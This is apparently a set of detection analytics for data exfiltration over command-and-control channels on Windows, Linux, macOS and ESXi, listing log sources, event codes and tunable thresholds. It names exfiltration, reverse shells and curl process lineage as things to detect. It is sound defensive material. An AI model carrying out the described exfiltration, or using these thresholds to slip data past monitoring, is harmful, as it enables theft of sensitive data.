Identifies suspicious outbound traffic volume mismatches from processes that typically do not generate network activity, particularly over C2 protocols like HTTPS, DNS, or custom TCP/UDP ports, following file or data access.
| Data Component | Name | Channel |
|---|---|---|
| Process Creation (DC0032) | WinEventLog:Sysmon | EventCode=1 |
| Network Connection Creation (DC0082) | WinEventLog:Sysmon | EventCode=3 |
| Network Traffic Content (DC0085) | NSM:Flow | Flow/PCAP analysis for outbound payloads |
| File Access (DC0055) | WinEventLog:Security | EventCode=4663 |
| Field | Description |
|---|---|
| DataVolumeThreshold | Set threshold for outbound transfer size exceeding typical C2 traffic (e.g., >1MB in <5min). |
| KnownBenignProcesses | List of approved processes that may exhibit high outbound traffic (e.g., updates). |
Monitors for processes reading sensitive files then immediately initiating unusual outbound connections or bulk transfer sessions over persistent sockets, particularly with encrypted or binary payloads.
| Data Component | Name | Channel |
|---|---|---|
| Process Creation (DC0032) | auditd:SYSCALL | execve |
| Network Connection Creation (DC0082) | auditd:SYSCALL | connect |
| Network Traffic Content (DC0085) | NSM:Flow | conn.log + files.log + ssl.log |
| Network Traffic Flow (DC0078) | NSM:Flow | session stats with bytes_out > bytes_in |
| Field | Description |
|---|---|
| OutboundEntropyScore | Threshold for high-entropy payloads indicative of encoded or encrypted exfil data. |
| ConnectionDuration | Defines length of time over which transfer size must be aggregated to trigger detection. |
Detects unauthorized applications or scripts accessing sensitive data followed by establishing encrypted outbound communication to rare external destinations or with abnormal byte ratios.
| Data Component | Name | Channel |
|---|---|---|
| Network Traffic Content (DC0085) | macos:unifiedlog | eventMessage = 'open', 'sendto', 'connect' |
| Network Traffic Flow (DC0078) | macos:osquery | socket_events |
| Process Creation (DC0032) | macos:osquery | process_events |
| Field | Description |
|---|---|
| ParentProcessAncestry | Enables defenders to tune legitimate vs. suspicious lineage (e.g., launchd → curl is uncommon). |
| ProtocolList | Focus detection on unusual protocols (e.g., IRC, FTP, DNS over HTTPS). |
Detects VMs sending outbound traffic through non-standard services or to unknown destinations. Exfiltration over reverse shells tunneled via VMkernel or custom payloads routed via hostd/vpxa.
| Data Component | Name | Channel |
|---|---|---|
| Network Traffic Flow (DC0078) | esxi:vpxa | connection attempts and data transmission logs |
| Network Traffic Content (DC0085) | esxi:vmkernel | network stack module logs |
| File Access (DC0055) | esxi:syslog | guest OS outbound transfer logs |
| Field | Description |
|---|---|
| GuestOSAllowList | Limit detection to sensitive or externally-exposed VMs handling confidential data. |
| TransferSizeThresholdMB | Minimum outbound transfer size before flagging anomalous C2-based exfiltration. |
| ProtocolAllowList | Define expected protocols for outbound data (e.g., disallow FTP/SCP over high ports). |